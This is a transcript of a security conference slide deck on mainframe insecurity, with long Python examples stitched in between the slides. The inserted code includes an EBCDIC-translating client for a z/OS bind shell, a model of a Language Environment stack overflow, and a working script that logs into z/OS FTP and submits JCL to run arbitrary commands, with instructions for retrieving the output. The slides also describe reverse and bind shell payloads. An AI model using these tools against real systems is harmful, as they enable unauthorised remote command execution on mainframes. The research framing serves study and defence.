A Stuxnet for Mainframes

Apr 13, 2017


  • A STUXNET FOR MAINFRAMES

  • Cheryl Biswas

    Security researcher/analyst Threat Intel

    APTs, Mainframes, ICS SCADA, Shadow IT, StarTrek

    BSidesLV, Circle City, BSidesT0, SecTor, Hackfest, TiaraCon

    https://whitehatcheryl.wordpress.com

    Twitter: @3ncr1pt3d

    DISCLAIMER: The views represented here are solely her own and not those of her employers, past or present.

    11/4/2016 @3ncr1pt3d A Stuxnet For Mainframes

  • HEAD IN THE SAND DEFENCE

  • YOU SAY SCADA

    WE SAY MAINFRAMES

  • MOM!! THE INTERNET IS BROKEN

  • INTRO

    In the beginning

    There were mainframes

    And it was good.

  • Then came SCADA. And it was good too.

    http://fossils-archeology.wikia.com/wiki/Ankylosaurus

  • CONGRATULATIONS! IT'S A ... PLC

  • BUT THEN CAME ...

  • WHAT IS SCADA

  • I CAN'T LIVE ... IF LIVING IS WITHOUT YOU

  • DOES NOT PLAY WELL

    WITH OTHERS

  • WHAT ARE MAINFRAMES?

  • MAINFRAMES RIGHT?

  • THESE ARE NOT THE MAINFRAMES YOU'RE LOOKING FOR

  • THIS AIN'T YOUR GRANDMA'S MAINFRAME

  • MAINFRAMES - BUILT TO LAST

    High Availability

    Longevity

    Virtualization

    The ability to offload to separate engines

    Backward compatibility with older software

    Massive Throughput

    https://en.wikipedia.org/wiki/Mainframe_computer


  • SCADA vs MAINFRAME

    SCADA                            MAINFRAME
    Culture                          Culture
    Security approach                Security approach
    Perceptions                      Perceptions
    Built to last                    Built to last
    Closed off                       Closed off
    Does not play well with others   Does not play well with others

  • Innovation / Disruption

    Would you like some security with that?

  • SECURITY BASICS WE KEEP GETTING WRONG

    Passwords

    Encryption

    Access

    Patching

    http://blog.senr.io/blog/unique-snowflakes-or-ubiquitous-tech-the-truth-behind-the-industrial-internet-of-things-iiot

  • ICS / SCADA - WHAT HAVE WE LEARNED?

  • "NONE OF OUR SCADA OR ICS

    EQUIPMENT IS ACCESSIBLE FROM THE INTERNET."

    O RLY?

  • PROJECT SHINE

    1,000,000 SCADA/ICS devices found online

  • SCADA ATTACK VECTORS

  • SCADA ATTACKS: Malicious Trojan

    http://www.risidata.com/Database

  • SCADA ATTACKS: Stolen equipment

    http://www.risidata.com/Database

  • SCADA ATTACKS: Social engineering

    http://www.risidata.com/Database

  • SCADA - JUMPING AIR GAPS

    Designed for underwater communication

    Near-ultrasonic frequency

    Remote keylogging over multiple hops

    http://www.jocm.us/index.php?m=content&c=index&a=show&catid=124&id=600

  • MAINFRAMES & SCADA - THE LINKS

    Similar in culture

    Lack of security

    Perceived as secure

    Air gapped

    See no evil, because you don't see it if you aren't looking

  • BUT IT'S AIR GAPPED

    "Mainframe modernization, or exposing the classic system of record data to new services, means that the data is no longer isolated on the mainframe; the world is now unknown, unknown. We have lost sight and control of where the data is going the minute we try to harness mainframe data for other purposes than batch or transaction applications." - z/OS expert

    http://www.symantec.com/connect/blogs/mind-gap-are-air-gapped-systems-safe-breaches

  • MAINFRAME - LACK OF ATTACK DATA

    Because what you don't see won't hurt you

  • CULTURE

    http://mainframed767.tumblr.com/post/79167015212/please-dont-post-on-mainframe-forums?is_related_post=1

  • MAINFRAME EXPLOIT RESEARCH

  • MAINFRAME - EXPLOIT RESEARCH

    Bigendiansmalls

    https://www.bigendiansmalls.com/category/security/exploit-development/

  • MAINFRAME - NMAP

    Can now detect mainframe ports

    Mainframe banners are not static

    More accessible to others for hacking

    http://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-last
    http://mainframed767.tumblr.com/post/47105571997/nmap-script-to-grab-mainframe-screens

  • MAINFRAMES - BIND SHELLCODE

    Mainframe assembler

    EBCDIC to ASCII converter

    Connect with netcat

    https://www.bigendiansmalls.com/mainframe-bind-shell-source-code/

    [Figure: ASCII-to-EBCDIC and EBCDIC-to-ASCII translation tables]
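A translating client for the bind shell on this slide, added here as an example; it is not the slide's code and not from bigendiansmalls.com. It builds the two translation tables the slide pictures from Python's built-in IBM-037 codec, so it assumes the mainframe side uses code page 037 (z/OS Unix often uses IBM-1047, which differs in a few punctuation bytes), and it assumes the shell wants NL (0x15) as its line terminator, as z/OS Unix text does. The host, port and sample command are constructed.

```python
"""ASCII <-> EBCDIC translating client for a z/OS bind shell.

Added example; not the slide's code and not from bigendiansmalls.com.
Assumption: the mainframe side uses code page IBM-037 (cp037). z/OS Unix
services often use IBM-1047, which differs in a few punctuation bytes.
"""
import select
import socket
import sys

CODEPAGE = "cp037"  # assumption: IBM-037 on the mainframe side

# The two 256-byte tables the slide pictures, derived from the codec:
# cp037 maps each byte to exactly one Latin-1 character, so each direction
# is a plain byte table usable with bytes.translate().
_e2a = bytearray(bytes(range(256)).decode(CODEPAGE).encode("latin-1"))
_a2e = bytearray(bytes(range(256)).decode("latin-1").encode(CODEPAGE))

# z/OS Unix text ends a line with NL (0x15); the codec maps ASCII LF (0x0A)
# to EBCDIC LF (0x25) instead. Swap the two so a line typed at the client
# terminates the command on the shell side (assumption about the bind shell).
_a2e[0x0A], _a2e[0x85] = 0x15, 0x25
_e2a[0x15], _e2a[0x25] = 0x0A, 0x85
ASCII_TO_EBCDIC = bytes(_a2e)
EBCDIC_TO_ASCII = bytes(_e2a)


def ascii_to_ebcdic(data: bytes) -> bytes:
    """Translate bytes typed at the ASCII client into EBCDIC for the mainframe."""
    return data.translate(ASCII_TO_EBCDIC)


def ebcdic_to_ascii(data: bytes) -> bytes:
    """Translate EBCDIC bytes from the mainframe into ASCII for display."""
    return data.translate(EBCDIC_TO_ASCII)


def relay(host: str, port: int) -> None:
    """Netcat-style loop: stdin lines go out as EBCDIC, socket bytes come
    back as ASCII. Uses select() on stdin, so POSIX only."""
    stdin, stdout = sys.stdin.buffer, sys.stdout.buffer
    with socket.create_connection((host, port)) as sock:
        inputs = [sock, stdin]
        while inputs:
            ready, _, _ = select.select(inputs, [], [])
            if sock in ready:
                chunk = sock.recv(4096)
                if not chunk:
                    return                      # shell closed the connection
                stdout.write(ebcdic_to_ascii(chunk))
                stdout.flush()
            if stdin in ready:
                line = stdin.readline()
                if not line:                    # EOF on stdin: half-close
                    inputs.remove(stdin)
                    sock.shutdown(socket.SHUT_WR)
                else:
                    sock.sendall(ascii_to_ebcdic(line))


if __name__ == "__main__":
    # constructed usage: python3 relay.py HOST 4444
    relay(sys.argv[1], int(sys.argv[2]))
```

Running `python3 relay.py HOST PORT` against the bind shell gives the same interaction as `nc` would, except that `ls -la` leaves the client as `93 A2 40 60 93 81 15` rather than ASCII, and the shell's EBCDIC output comes back readable. If the target turns out to use IBM-1047, only `CODEPAGE` changes; the line-terminator swap stays.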

  • LET'S GET TECHNICAL

  • MAINFRAMES - STACK, BUT DIFFERENT

    The mainframe (Language Environment) prologue creates a Dynamic Storage Area (DSA) for the routine

    A field in the DSA points to the next free byte of the stack

    Nothing is subtracted from an ESP-style stack pointer to allocate space

    A general register is used as the stack pointer by convention (register 13 points at the current save area/DSA), but a routine is not forced to do so

    https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/

  • ALLOCATION OF MEMORY - FUNCTION PROLOGUE

    [Figure: x86 stack at the moment a function is called from MAIN(): the return address (IP) and the saved frame pointer (SFP) are pushed on top of MAIN()'s frame, EBP is moved to the new frame and ESP marks the top of the stack; slots labelled 0x8012343, 0x8012344 and 0x8012345 (SFP)]

  • ALLOCATION OF MEMORY - FUNCTION PROLOGUE

    [Figure: the same stack after the prologue allocates FUNCTION()'s locals: ESP is moved down by 28 bytes (ESP - 28) below the saved IP and SFP, giving FUNCTION() its own frame above MAIN()'s]

  • ALLOCATION OF MEMORY - FUNCTION EPILOGUE

    [Figure: the epilogue tears the frame down: ESP goes back to the saved frame pointer, EBP is restored from the SFP and execution returns to the saved IP in MAIN()]

  • ALLOCATION OF MEMORY - DSA PROLOGUE

    [Figure: the z/OS equivalent: when a function is called from MAIN(), the prologue obtains a Dynamic Storage Area containing a save area and a pointer back to the original (caller's) DSA; the DSA is not a hardware stack]

  • HOW TO EXPLOIT - STRING EXPLOITATION != WIN

    Not gonna happen

    Always aware of length

    [Figure: two strings stored with an explicit length field beside them, and the classic AAAAAAAAAA overrun input]

    https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/

  • MAINFRAMES - UNIQUE TO EXPLOIT: S0C1 EXCEPTION

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

    No size checking

    Overflow causes execution to branch to another memory location

    [Figure: a run of AAAAAAAA overflow bytes landing in memory that contains data; the processor tries to decode that data as opcodes, the opcode does not exist, and the program abends with S0C1 (operation exception)]

  • MAINFRAMES - UNIQUE TO EXPLOIT: S0C1 EXCEPTION

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

    [Figure: the DSA chain: DSA level 0 calls into DSA 1, which calls into DSA 2; each return goes back one level to its caller (DSA 1 returns to DSA 0), with register 14 holding the return point (RP)]

  • MAINFRAMES - UNIQUE TO EXPLOIT: GLOBALLY ADDRESSED ARRAYS, S0C1 EXCEPTION

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

    [Figure: the same chain extended to DSA 3, register 14 = RP: after the overflow, the procedure that should return to level 1 actually executes code in DSA 2]
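A model of the DSA chain drawn on these slides and of the length-unchecked copy that walks up it, added here as an example; it is not the slides' code and not Jan Cannaerts' guest post. It keeps the MVS linkage convention the slides rely on (the called routine saves the caller's R14 into the caller's save area, and the caller's next-available-byte becomes the callee's DSA) and nothing else: the three-field header, the 32-byte locals and the return addresses 0x1000/0x2000/0x3000 are constructed for the model, not the real LE layout, and the 0xC1 filler is EBCDIC 'A'.

```python
"""Model of z/OS Language Environment (LE) Dynamic Storage Areas and of a
length-unchecked copy walking up the DSA chain.

Added example, not code from the slides or the guest post. Simplified
layout: each DSA starts with a save area (back chain and the return
address the next deeper routine saves for its caller), then the NAB
(next available byte) and 32 bytes of locals. The real 31-bit LE DSA
has a 72-byte standard save area and more fields; offsets here are a
teaching model only.
"""
import struct

DSA_HDR = struct.Struct(">III")     # back_chain, saved_r14, nab (big-endian, like z/Architecture)
LOCALS = 32
DSA_SIZE = DSA_HDR.size + LOCALS    # 44 bytes per DSA in this model


class LEStack:
    """One stack segment. Level 0 (the main routine) owns the DSA at offset 0."""

    def __init__(self, size: int = 1024) -> None:
        self.seg = bytearray(size)
        DSA_HDR.pack_into(self.seg, 0, 0, 0, DSA_SIZE)

    def header(self, off: int):
        """(back_chain, saved_r14, nab) of the DSA at segment offset `off`."""
        return DSA_HDR.unpack_from(self.seg, off)

    def prologue(self, r13: int, r14: int) -> int:
        """Called routine's prologue. r13 = caller's DSA, r14 = return address.
        Nothing is subtracted from a stack pointer: the caller's NAB becomes
        our DSA, and the caller's R14 is stored in the caller's own save
        area (MVS linkage). Returns the new R13."""
        back, _, nab = self.header(r13)
        DSA_HDR.pack_into(self.seg, r13, back, r14, nab)
        self_off = nab
        DSA_HDR.pack_into(self.seg, self_off, r13, 0, self_off + DSA_SIZE)
        self.seg[self_off + DSA_HDR.size:self_off + DSA_SIZE] = bytes(LOCALS)
        return self_off

    def epilogue(self, r13: int):
        """Returning routine: R13 goes back to the caller's DSA, R14 is
        reloaded from the save area there, and execution branches to R14.
        Returns (new_r13, r14)."""
        back, _, _ = self.header(r13)
        _, saved_r14, _ = self.header(back)
        return back, saved_r14

    def copy_unchecked(self, r13: int, data: bytes) -> None:
        """The defect: strcpy-style copy into this DSA's locals with no
        length check, free to run into the next DSA's save area."""
        start = r13 + DSA_HDR.size
        if start + len(data) > len(self.seg):
            raise MemoryError("overrun past the stack segment")
        self.seg[start:start + len(data)] = data

    def copy_checked(self, r13: int, data: bytes) -> None:
        """The fix: refuse anything larger than the locals."""
        if len(data) > LOCALS:
            raise ValueError(f"{len(data)} bytes exceed the {LOCALS}-byte locals")
        start = r13 + DSA_HDR.size
        self.seg[start:start + len(data)] = data


def run_scenario(checked: bool) -> int:
    """main -> level1 -> level2 -> level3. level1 copies attacker input into
    its locals, then level3 returns. Returns the address level3 branches to."""
    st = LEStack()
    r13 = 0
    level1 = r13 = st.prologue(r13, 0x00001000)   # main   calls level1
    r13 = st.prologue(r13, 0x00002000)            # level1 calls level2
    r13 = st.prologue(r13, 0x00003000)            # level2 calls level3

    # Constructed input: 48 bytes of EBCDIC 'A' (0xC1). level1's locals hold
    # 32; the remaining 16 land on the start of level2's DSA, whose save
    # area holds the return address level3 will load.
    payload = b"\xc1" * 48
    if checked:
        try:
            st.copy_checked(level1, payload)
        except ValueError:
            pass                                   # input rejected, chain intact
    else:
        st.copy_unchecked(level1, payload)

    _, r14 = st.epilogue(r13)
    return r14


if __name__ == "__main__":
    # Unchecked: level3 branches to 0xC1C1C1C1, an address made of data. The
    # halfword fetched there decodes as no valid opcode and z/OS abends the
    # job with S0C1 (operation exception), which is the slide's point.
    print(f"unchecked: level3 returns to {run_scenario(False):#010x}")
    print(f"checked:   level3 returns to {run_scenario(True):#010x}")
```

Note what the overflow did not touch: level 3's own DSA is intact and its back chain still points at level 2. The damage is that level 3's epilogue trusts the save area at the start of level 2's DSA, and that save area now holds attacker bytes, so the return from level 3 is what branches into data. The checked copy rejects the 48-byte input and the chain unwinds to 0x3000 as before.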

  • MAINFRAMES - INSECURITY OF MEMORY

    Memory is not more secure than on Windows or Unix

    No DEP

    No strict ASLR

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

  • ACCESSIBLE TO YOU!

  • FTP EXPLOIT

    exploit/mainframe/ftp/ftp_jcl_creds

  • MAINFRAME - FIRST METASPLOIT MODULE

    Poorly configured FTP server

    FTP -> shell

    https://www.bigendiansmalls.com/a-logical-first-step/

  • FTP METASPLOIT MODULE

    ARCH_CMD               Executes a command, or uses a command to give a shell
    Platform: Mainframe    Uses the Mainframe payloads of Metasploit
    Target: Automatic      Only works with IBM FTP CS V.R.
    Requires credentials   Credentials allow a file to be uploaded
    Debugging enabled      Can enable Verbose and FTPdebug

    https://www.bigendiansmalls.com/a-logical-first-step/
    https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds

  • FTP METASPLOIT MODULE

    Checks banner

    If banner correct, logs in and uploads file

    File is uploaded as a JOB and executes

    https://www.bigendiansmalls.com/a-logical-first-step/

  • GENERIC JCL TEST FOR MAINFRAME EXPLOITS

    This can be used as a template for other JCL based payloads

    https://www.rapid7.com/db/modules/payload/cmd/mainframe/generic_jcl
    https://www.bigendiansmalls.com/a-logical-first-step/
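The FTP-to-JES path the module automates (banner check, login, upload as a job) written out as an added example; this is not the Metasploit module, not the generic_jcl payload and not bigendiansmalls code. It assumes the z/OS Communications Server FTP greeting contains "IBM FTP CS VxRy", that after `SITE FILETYPE=JES` a `STOR` is answered with "It is known to JES as JOBnnnnn", and that BPXBATCH is available to run a z/OS Unix command; the host, credentials, job name, account and the sample banner and reply in the test are constructed placeholders.

```python
"""Submitting JCL to JES over z/OS FTP, the path ftp_jcl_creds automates.

Added example, not the Metasploit module or bigendiansmalls code.
Assumptions: the server greets with 'IBM FTP CS VxRy', SITE FILETYPE=JES
turns STOR into a job submission answered with 'It is known to JES as
JOBnnnnn', and BPXBATCH exists to run one z/OS Unix command.
"""
import io
import re
from ftplib import FTP

ZOS_BANNER = re.compile(r"IBM FTP CS V\d+R\d+")
JES_JOBID = re.compile(r"known to JES as (\w+)")


def is_zos_ftp(banner: str) -> bool:
    """The banner check done before trying anything else."""
    return ZOS_BANNER.search(banner) is not None


def parse_jobid(response: str) -> str:
    """Pull the JES job id out of the STOR reply; raise if JES did not take it."""
    m = JES_JOBID.search(response)
    if not m:
        raise RuntimeError(f"JES did not accept the job: {response!r}")
    return m.group(1)


def build_jcl(jobname: str, account: str, command: str) -> str:
    """A small job that runs one z/OS Unix command under BPXBATCH and sends
    its output to SYSOUT. JCL rules enforced: job name of 1-8 characters
    starting with a letter or national character, and every statement
    within columns 1-71 (longer commands need continuation, not handled)."""
    jobname = jobname.upper()
    if not re.fullmatch(r"[A-Z@#$][A-Z0-9@#$]{0,7}", jobname):
        raise ValueError(f"invalid job name {jobname!r}")
    lines = [
        f"//{jobname:<8} JOB ({account}),'JCLTEST',CLASS=A,MSGCLASS=X,",
        "//            NOTIFY=&SYSUID",
        "//STEP1    EXEC PGM=BPXBATCH,",
        f"//            PARM='SH {command}'",
        "//STDOUT   DD SYSOUT=*",
        "//STDERR   DD SYSOUT=*",
    ]
    for line in lines:
        if len(line) > 71:
            raise ValueError(f"JCL statement runs past column 71: {line!r}")
    return "\n".join(lines) + "\n"


def submit_jcl(host: str, user: str, password: str, jcl: str, port: int = 21) -> str:
    """Log in, point the session at the JES internal reader and upload the
    job as text (TYPE A, so the server itself translates ASCII to EBCDIC).
    Returns the JES job id."""
    ftp = FTP()
    ftp.connect(host, port, timeout=30)
    if not is_zos_ftp(ftp.getwelcome()):
        ftp.close()
        raise RuntimeError("not a z/OS Communications Server FTP banner")
    ftp.login(user, password)
    ftp.sendcmd("SITE FILETYPE=JES")      # STOR now submits to JES instead of writing a data set
    reply = ftp.storlines("STOR JOB.JCL", io.BytesIO(jcl.encode("ascii")))
    ftp.quit()
    return parse_jobid(reply)


if __name__ == "__main__":
    import sys
    # constructed usage: python3 submit.py HOST USER PASSWORD
    host, user, password = sys.argv[1:4]
    print(submit_jcl(host, user, password, build_jcl("JCLTEST", "ACCT", "id")))
```

Everything the module needs from the server is visible here: credentials good enough to log in, a writable FTP session, and the JES interface enabled. The same session can collect the result: with FILETYPE=JES still set, `RETR` of the returned job id fetches that job's spool output, which is how a payload's output gets back to the operator.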

  • Z/OS (MVS) COMMAND SHELL, REVERSE TCP

    Creates a reverse shell. This implementation does not include EBCDIC character translation, so a client with translation capabilities is required. MSF handles this automatically.

    https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds
    https://www.bigendiansmalls.com/mainframe-bind-shell-source-code/

  • GENERIC COMMAND SHELL

    Connect back to attacker and spawn a command shell

  • HOW THE MIGHTY FALL

  • BIGEND